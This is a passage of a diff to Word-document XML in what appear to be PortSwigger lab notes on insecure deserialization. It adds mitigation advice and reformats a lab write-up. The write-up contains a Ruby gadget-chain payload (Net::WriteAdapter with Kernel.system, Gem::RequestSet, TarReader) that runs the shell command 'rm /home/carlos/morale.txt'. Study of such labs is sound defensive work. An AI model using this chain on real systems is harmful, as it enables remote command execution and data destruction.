+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Kernel.load</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, or </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Kernel.system</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> are not directly callable by deserialized objects. Consider using a secure coding library or framework that disables or sandboxes these methods.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Input Validation:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Always validate and sanitize user inputs. Ensure that the data you're deserializing is in the expected format and does not contain unexpected or harmful content.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Avoid Exposing Dangerous Gadgets:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Some libraries and classes expose dangerous functions that can be used in a gadget chain. Review the classes and libraries used in your application and remove or replace those that expose such functions.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Patch and Update:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Regularly patch and update both your Ruby on Rails application and all its dependencies. Exploits often target known vulnerabilities in older versions of software.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Encrypt and Sign Serialized Data:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Encrypt the serialized data so that it can't be viewed or modified by potential attackers. In addition, sign the data to ensure that it hasn't been tampered with before deserializing it.</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -1298,8 +1876,100 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="776F2EEC"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E2A21622"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1037312186">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="286933762">
+    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>

--- a/PortSwigger Labs/Advanced Topics/Insecure Deserialization/Lab 6 - Exploiting Ruby deserialization using a documented gadget chain.docx
+++ b/PortSwigger Labs/Advanced Topics/Insecure Deserialization/Lab 6 - Exploiting Ruby deserialization using a documented gadget chain.docx
@@ -442,7 +442,6 @@
         </w:rPr>
         <w:t>Gem::</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -452,7 +451,6 @@
         </w:rPr>
         <w:t>SpecFetcher</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -513,25 +511,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> the payload from running when we </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Marshal.dump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> it</w:t>
+        <w:t xml:space="preserve"> the payload from running when we Marshal.dump it</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -582,18 +562,8 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">    def </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>marshal_dump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">    def marshal_dump</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -689,7 +659,6 @@
         </w:rPr>
         <w:t>Net::</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -697,43 +666,24 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>WriteAdapter.new</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>(Kernel, :system)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>rs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
+        <w:t>WriteAdapter.new(Kernel, :system)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rs = </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -744,7 +694,6 @@
         </w:rPr>
         <w:t>Gem::</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -754,17 +703,15 @@
         </w:rPr>
         <w:t>RequestSet.allocate</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -781,27 +728,17 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_variable_set</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>('@sets', wa1)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>_variable_set('@sets', wa1)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -818,52 +755,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_variable_set</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>('@</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>git_set</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>', "rm /home/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>carlos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>/morale.txt")</w:t>
+        <w:t>_variable_set('@git_set', "rm /home/carlos/morale.txt")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -891,7 +783,6 @@
         </w:rPr>
         <w:t>Net::</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -899,61 +790,24 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>WriteAdapter.new</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>rs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>, :resolve)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
+        <w:t>WriteAdapter.new(rs, :resolve)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">i = </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -971,28 +825,17 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Package::TarReader::</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Entry.allocate</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Package::TarReader::Entry.allocate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1008,16 +851,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>set</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t>set(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -1037,7 +871,6 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1053,16 +886,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>set</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t>set(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -1071,25 +895,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>'@header', "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>aaa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>")</w:t>
+        <w:t>'@header', "aaa")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1117,7 +923,6 @@
         </w:rPr>
         <w:t>Net::</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -1127,17 +932,15 @@
         </w:rPr>
         <w:t>BufferedIO.allocate</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -1154,45 +957,17 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_variable_set</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">('@io', </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>_variable_set('@io', i)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -1209,34 +984,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_variable_set</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>('@</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>debug_output</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>', wa2)</w:t>
+        <w:t>_variable_set('@debug_output', wa2)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1271,28 +1019,17 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Package::</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>TarReader.allocate</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Package::TarReader.allocate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
